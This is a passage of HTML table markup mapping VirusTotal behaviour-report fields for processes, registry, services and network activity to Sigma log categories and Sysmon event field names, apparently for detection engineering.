style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">process_access</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">create_remote_thread</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">process_creation</span>
</p>
</td>
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">CallTrace</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">GrantedAccess</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">SourceImage</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">TargetImage</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">StartModule</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">StartFunction</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">TargetImage</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">SourceImage</span>
</p>
</td>
</tr>
<tr style="height: 150pt;">
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">behavior_processes</span>
</p>
</td>
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.processes_terminated
</span></p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.processes_killed
</span></p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.processes_created</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.command_executions</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.processes_injected
</span></p>
</td>
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">process_access</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">create_remote_thread</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">process_creation</span>
</p>
</td>
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">CallTrace</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">GrantedAccess</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">SourceImage</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">TargetImage</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">StartModule</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">StartFunction</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">TargetImage</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">SourceImage</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">Image</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">CommandLine</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">ParentCommandLine</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">ParentImage</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">OriginalFileName</span>
</p>
</td>
</tr>
<tr style="height: 60pt;">
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">behavior_registry</span>
</p>
</td>
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.registry_keys_deleted</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.registry_keys_opened</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.registry_keys_set</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.registry_keys_set[x].key</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.registry_keys_set[x].value</span>
</p>
</td>
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">registry_add</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">registry_delete</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">registry_event</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">registry_rename</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">registry_set</span>
</p>
</td>
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">EventType</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">TargetObject</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">Details</span>
</p>
</td>
</tr>
<tr style="height: 82.5pt;">
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">behavior_services</span>
</p>
</td>
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.services_bound</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.services_created</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.services_opened</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.services_started</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.services_stopped</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.services_deleted</span>
</p>
</td>
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">registry_set</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">process_creation</span>
</p>
</td>
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">Image</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">CommandLine</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">ParentCommandLine</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">ParentImage</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">EventType</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">TargetObject</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">Details</span>
</p>
</td>
</tr>
<tr style="height: 352.5pt;">
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">behavior_network</span>
</p>
</td>
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.dns_lookups</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.dns_lookups[x].hostname</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.dns_lookups[x].resolved_ips</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.hosts_file</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.ip_traffic</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.ip_traffic[x].destination_ip</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.ip_traffic[x].destination_port</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.ip_traffic[x].transport_layer_protocol</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.http_conversations</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.http_conversations[x].url</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.http_conversations[x].request_method</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.http_conversations[x].request_headers</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.http_conversations[x].response_headers</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.http_conversations[x].response_status_code</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.http_conversations[x].response_body_filetype</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.smtp_conversations[x].hostname</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
